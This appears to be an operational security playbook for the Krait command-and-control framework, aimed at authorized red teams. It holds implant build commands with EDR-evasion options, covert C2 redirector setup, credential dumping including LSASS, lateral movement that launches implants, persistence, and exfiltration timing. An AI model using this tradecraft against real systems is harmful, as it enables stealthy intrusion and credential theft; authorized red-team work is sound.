OPSEC Playbook
Operational security guidelines and recommended profiles
Operational security guidelines for using Krait in authorized red team engagements.
Build Profiles by Engagement Type
External Pentest (Internet-Facing Target)
krait> build windows -s <REDIRECTOR_DOMAIN> -p 443 --external-port 443 \
-i 60 -j 30 --all-evasion --profile onedrive
- Use a domain, not an IP — bare IP in DNS/SNI is suspicious
- Long interval (60s+) with high jitter (30%) — low and slow
- Traffic profile matching the target’s SaaS stack (if they use Microsoft, use
onedriveorteams) - All templates are MSVC-compiled — they match native Windows PE characteristics
- Always use a redirector with a decoy site
Internal Assessment (On-Premise, EDR Present)
krait> build windows -s <C2_IP> -p 8443 \
-i 30 -j 20 --all-evasion --loadlib-proxy \
--module-stomp --cover svchost
- Direct connection acceptable if you’re already inside the network
- Shorter interval (30s) for faster iteration
--loadlib-proxyfor execute-assembly stealth--module-stomp— loader PE lives in file-backed DLL memory, not private RWXsvchostcover — blends in with dozens of realsvchost.exeprocesses
Assumed Breach (Already Have Access)
krait> build windows -s <C2_IP> -p 8443 \
-i 10 -j 10 --hwbp-bypass
- Fast interval for rapid enumeration
- Minimal evasion flags (you’re already in, focus on speed)
- No traffic profile needed for internal lateral movement
Stealth (Long-Term Access, Advanced SOC)
krait> build windows -s <REDIRECTOR_DOMAIN> -p 443 --external-port 443 \
-i 300 -j 50 --all-evasion --loadlib-proxy \
--module-stomp --context-hijack --section-map --delayed-suspend \
--profile teams --cover svchost
- 5-minute interval with 50% jitter (2.5–7.5 min between callbacks)
- All evasion flags plus advanced migration techniques
- Teams profile (ubiquitous in enterprise)
Linux Pivot
krait> build linux -s <C2_IP> -p 8443 \
-i 30 -j 20 -m kworker -c systemd-resolved --profile slack
- Process mask (
kworker) hides the agent inpsoutput - Binary cover (
systemd-resolved) replaces the on-disk binary name - Same traffic profiles as Windows
macOS Pivot
krait> build macos -s <C2_IP> -p 8443 \
-i 30 -j 20 --profile slack
- Universal binary (arm64 + x86_64) — runs on both Intel and Apple Silicon
- SecureTransport TLS — uses the native macOS TLS stack, no OpenSSL
- IOKit power assertions keep WiFi alive during display sleep (assertion name
com.apple.apsd) - Use
spawn <path>(DYLD_INSERT_LIBRARIES) for process migration with SIP enabled — target must be a user-installed binary (e.g., Homebrew python3), not a system binary (SIP strips the env var from/usr/,/System/,/bin/,/sbin/). Safari’s hardened runtime blocks DYLD injection inject <pid>(task_for_pid) works when SIP is disabled- Cron persistence via
persist-cron, shell profile persistence viapersist-bashrc(targets.zshrc/.zprofile— macOS defaults to zsh since Catalina) - Shell profile persistence is opportunistic (fires when a terminal opens), not boot-time. Cron persistence is boot-time but subject to TCC (see below)
macOS TCC Local Network Prompt
Critical OPSEC consideration: macOS TCC (Transparency, Consent, and Control) shows a “Local Network” permission popup when an unsigned binary attempts to connect to LAN IP addresses. The popup says “Allow [binary] to find devices on local network?” with Allow/Don’t Allow buttons.
This does NOT trigger for internet-bound HTTPS connections — only for LAN-destined traffic.
Impact:
- Lab setups pointing agents at a LAN C2 server will trigger the popup on first connection — including cron-launched agents after reboot
- Production setups using an internet-facing redirector (Azure Front Door, CloudFront, or any public domain/IP) are unaffected
Mitigation: Always use an internet-facing redirector for macOS targets. Never point macOS agents directly at a LAN IP in production engagements.
Redirector Best Practices
- Use a CDN or cloud provider — Krait ships CloudFront and Azure Front Door CDN redirectors. Generate configs from the CLI (
redirector cloudfront --origin <host>) or the Web UI Redirector page. CloudFront connects agents to ad*.cloudfront.netdomain with a valid AWS TLS certificate. Azure Front Door connects agents to an*.azurefd.netdomain with a valid Microsoft TLS certificate. Both hide the C2 server IP from the target network. This is traffic blending, not domain fronting — the C2 traffic is indistinguishable from any other CDN-hosted service on the wire. - Category match — If using the
teamsprofile, your domain should be categorized as “Business” or “Cloud Services”, not “Uncategorized”. - Decoy site — Always configure a decoy. A bare nginx 403 page is suspicious. Redirect to the real service you’re mimicking.
- Geo-blocking — If the target is US-only, block non-US source IPs at the redirector. Reduces noise and potential burn from sandboxes.
- Separate redirectors per transport — Don’t mix HTTPS and DNS on the same host.
- Burn and rebuild — If a redirector is flagged, spin up a new one with a new IP and domain. Don’t reuse.
- CDN-specific — Agent
client_ipshows CDN edge IPs (CloudFront or Front Door), not the agent’s real IP. Restrict port 80 on the server to CDN traffic only. The origin IP is visible in CDN config — don’t expose it elsewhere. See the Deployment Guide for CloudFront setup and Azure Front Door for Front Door setup.
Artifact Cleanup
On the Target
krait [agent]> motw-remove C:\path\to\delivered.exe
krait [agent]> rm C:\path\to\delivered.exe
krait [agent]> rm C:\Windows\Temp\debug.dmp # if nanodump was used
On the C2
- Event logs contain operator commands, agent IDs, and timestamps
- Task results may contain credentials or sensitive data
- Clear or archive these after the engagement
Persistence Removal
krait [agent]> persist-comhijack remove
krait [agent]> persist-schtask remove <task_name>
krait [agent]> persist-wmi remove <name>
krait [agent]> persist-registry <method> remove
Always remove persistence before the engagement ends. Document what was installed and where.
What NOT to Do
- Don’t use default pipe names —
msagent_defaultis fine for labs. Use random names for engagements. - Don’t run from
C:\Users\Public— It’s the first place defenders look. UseC:\ProgramDataor app directories. - Don’t use the same implant build across multiple targets — Each build has a unique hash seed and XOR key (randomized per build), but rebuild for each target.
- Don’t run hashdump/nanodump during business hours — LSASS access triggers high-severity alerts on every EDR.
- Don’t migrate to
lsass.exeorcsrss.exe— Protected processes. The migration will fail and may trigger alerts. - Don’t migrate to UWP redirect stubs with
--remote-thread— On Windows 11, several executables are thin launchers that callShellExecuteWto ams-*:protocol URI and immediatelyExitProcess. The process terminates before the remote thread can complete registration. Affected targets includecalc.exe,mspaint.exe(Win11 24H2+), andsnippingtool.exe. These work with EarlyBird APC (the default trigger) because the APC blocks the main thread before it can exit. With--remote-threador--all-evasion(which enables remote-thread), use long-running targets:dllhost.exe(default),notepad.exe,runtimebroker.exe,svchost.exe. - Don’t chain credential-dumping commands — Run them individually with time between. A burst of privilege escalation + credential access in one poll cycle is a high-confidence indicator.
- Don’t leave SOCKS proxies running indefinitely — Start, use, stop. Long-running tunnels increase detection risk.
- Don’t use
cmdorpowershellwhen a BOF exists — BOFs execute in-process.cmdspawnscmd.exe, which is visible and logged.
Operational Patterns
Initial Enumeration (First 5 Minutes)
whoami
hostname
sysinfo
ps
ipconfig
enum-firewall
defender-config
sysmon-detect
detect-hooks
Run these before anything else. Know your environment, especially what security products are present and what hooks are installed.
Situational Awareness
# Check for EDR hooks before running evasion-sensitive operations
detect-hooks
# Check for Sysmon before touching the filesystem
sysmon-detect
# Check Defender exclusions — might find a safe directory
defender-config
Credential Access Sequence
# 1. Escalate if needed
getsystem
# 2. Check what's available without touching LSASS
enum-creds
wifi-passwords
psh-history
autologon
cred-files
# 3. Only if needed — LSASS dump (high risk)
nanodump
# 4. Clean up
rev2self
Lateral Movement Sequence
# 1. Enumerate targets
netview
netsession-sweep
ldapsearch "(objectClass=computer)" cn
# 2. Test connectivity
probe 10.0.0.5 445
probe 10.0.0.5 5985
# 3. Move
wmi-exec 10.0.0.5 "C:\path\to\implant.exe"
# 4. Link the new agent
link 10.0.0.5 krait_pipe
Transport OPSEC
| Transport | OPSEC Risk | Mitigation |
|---|---|---|
| HTTPS | Low (with profile) | Use traffic profiles + redirector + CDN (CloudFront or Azure Front Door) |
| HTTPS | Medium (without profile) | Default URIs (/api/*) may be flagged |
| SMB | Low | Choose non-obvious pipe names |
| TCP | Medium | Raw TCP on unusual ports stands out |
| DNS | Medium-High | High query volume triggers anomaly detection |
| DOH | Low-Medium | HTTPS to known resolvers blends in; TLS inspection breaks it |
Timing
- Business hours: Low-frequency polling (60s+), no credential dumping, no lateral movement
- Off-hours: Higher frequency OK, run intensive operations (hashdump, execute-assembly)
- Weekends: Best window for bulk data exfiltration and lateral movement
- After detection: Immediately go silent (increase interval to 300s+), assess what was caught, pivot to backup access